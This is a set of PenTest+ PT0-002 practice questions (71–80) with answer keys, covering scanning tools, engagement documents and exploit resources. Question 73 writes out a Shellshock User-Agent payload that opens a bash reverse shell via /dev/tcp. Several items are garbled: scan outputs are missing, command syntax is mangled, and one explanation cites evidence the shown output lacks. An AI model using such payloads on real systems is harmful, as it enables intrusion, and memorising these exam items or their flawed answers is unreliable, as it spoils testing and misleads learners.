CompTIA CompTIA Certifications PT0-002 Questions & Answers

• Question 71:

  A penetration tester conducted a vulnerability scan against a client's critical servers and found the following:

  

  Which of the following would be a recommendation for remediation?

  A. Deploy a user training program

  B. Implement a patch management plan

  C. Utilize the secure software development life cycle

  D. Configure access controls on each of the servers

  Correct Answer: B

• Question 72:

  During a vulnerability scanning phase, a penetration tester wants to execute an Nmap scan using custom NSE scripts stored in the following folder:

  /home/user/scripts

  Which of the following commands should the penetration tester use to perform this scan?

  A. nmap resume "not intrusive"

  B. nmap script default safe

  C. nmap script /home/user/scripts

  D. nmap -load /home/user/scripts

  Correct Answer: C

  The Nmap command in the question aims to use custom NSE scripts stored in a specific folder. The correct syntax for this option is to use the script argument followed by the path to the folder. The other commands are either invalid, use the wrong argument, or do not specify the folder path. References: Best PenTest+ certification study resources and training materials, CompTIA PenTest+ PT0-002 Cert Guide, 101 Labs -- CompTIA PenTest+: Hands-on Labs for the PT0-002 Exam

• Question 73:

  A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:

  exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>and /dev/tcp/127.0.0.1/9090 0>and1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

  Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

  A. exploits = {“User-Agent”: “() { ignored;};/bin/bash –i id;whoami”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

  B. exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>and find / -perm -4000”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

  C. exploits = {“User-Agent”: “() { ignored;};/bin/sh –i ps –ef” 0>and1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

  D. exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>and /dev/tcp/10.10.1.1/80” 0>and1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

  Correct Answer: A

• Question 74:

  A penetration tester utilized Nmap to scan host 64.13.134.52 and received the following results:

  

  Based on the output, which of the following services are MOST likely to be exploited? (Choose two.)

  A. Telnet

  B. HTTP

  C. SMTP

  D. DNS

  E. NTP

  F. SNMP

  Correct Answer: BD

• Question 75:

  An Nmap network scan has found five open ports with identified services. Which of the following tools should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports?

  A. OpenVAS

  B. Drozer

  C. Burp Suite

  D. OWASP ZAP

  Correct Answer: A

  OpenVAS is a full-featured vulnerability scanner.

  OWASP ZAP = Burp Suite

  Drozer (Android) = drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.

  Reference: https://pentest-tools.com/network-vulnerability-scanning/network-security- scanner-online-openvas

• Question 76:

  A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity. Which of the following is the MOST important action to take before starting this type of assessment?

  A. Ensure the client has signed the SOW.

  B. Verify the client has granted network access to the hot site.

  C. Determine if the failover environment relies on resources not owned by the client.

  D. Establish communication and escalation procedures with the client.

  Correct Answer: A

  The statement of work (SOW) is a document that defines the scope, objectives, deliverables, and timeline of a penetration testing engagement. It is important to have the client sign the SOW before starting the assessment to avoid any legal or contractual issues.

• Question 77:

  A penetration tester is exploring a client's website. The tester performs a curl command and obtains the following:

  * Connected to 10.2.11.144 (::1) port 80 (#0)

  > GET /readmine.html HTTP/1.1

  > Host: 10.2.11.144

  > User-Agent: curl/7.67.0

  > Accept: */* >

  *

  Mark bundle as not supporting multiuse

  < HTTP/1.1 200

  < Date: Tue, 02 Feb 2021 21:46:47 GMT

  < Server: Apache/2.4.41 (Debian)

  < Content-Length: 317

  < Content-Type: text/html; charset=iso-8859-1

  <

  Which of the following tools would be BEST for the penetration tester to use to explore this site further?

  A.

  Burp Suite

  B.

  DirBuster

  C.

  WPScan

  D.

  OWASP ZAP

  Correct Answer: C

  WPScan is a tool that can be used to scan WordPress sites for vulnerabilities, such as outdated plugins, themes, or core files, misconfigured settings, weak passwords, or user enumeration. The curl command reveals that the site is running WordPress and has a readme.html file that may disclose the version number. Therefore, WPScan would be the best tool to use to explore this site further. Burp Suite is a tool that can be used to intercept and modify web requests and responses, but it does not specialize in WordPress scanning. DirBuster is a tool that can be used to brute-force directories and files on web servers, but it does not exploit WordPress vulnerabilities. OWASP ZAP is a tool that can be used to perform web application security testing, but it does not focus on WordPress scanning.

  Reference: https://tools.kali.org/web-applications/burpsuite

• Question 78:

  A consultant just performed a SYN scan of all the open ports on a remote host and now needs to remotely identify the type of services that are running on the host. Which of the following is an active reconnaissance tool that would be BEST to use to accomplish this task?

  A. tcpdump

  B. Snort

  C. Nmap

  D. Netstat

  E. Fuzzer

  Correct Answer: C

• Question 79:

  The delivery of a penetration test within an organization requires defining specific parameters regarding the nature and types of exercises that can be conducted and when they can be conducted. Which of the following BEST identifies this concept?

  A. Statement of work

  B. Program scope

  C. Non-disclosure agreement

  D. Rules of engagement

  Correct Answer: D

  Rules of engagement (ROE) is a document that outlines the specific guidelines and limitations of a penetration test engagement. The document is agreed upon by both the penetration testing team and the client and sets expectations for how the test will be conducted, what systems are in scope, what types of attacks are allowed, and any other parameters that need to be defined. ROE helps to ensure that the engagement is conducted safely, ethically, and with minimal disruption to the client's operations.

• Question 80:

  Which of the following is the BEST resource for obtaining payloads against specific network infrastructure products?

  A. Exploit-DB

  B. Metasploit

  C. Shodan

  D. Retina

  Correct Answer: A

  "Exploit Database (ExploitDB) is a repository of exploits for the purpose of public security, and it explains what can be found on the database. The ExploitDB is a very useful resource for identifying possible weaknesses in your network and for staying up to date on current attacks occurring in other networks" Exploit-DB is a website that collects and archives exploits for various software and hardware products, including network infrastructure devices. Exploit-DB allows users to search for exploits by product name, vendor, type, platform, CVE number, or date. Exploit- DB is a useful resource for obtaining payloads against specific network infrastructure products. Metasploit is a framework that contains many exploits and payloads, but it is not a resource for obtaining them. Shodan is a search engine that scans the internet for devices and services, but it does not provide exploits or payloads. Retina is a vulnerability scanner that identifies weaknesses in network devices, but it does not provide exploits or payloads.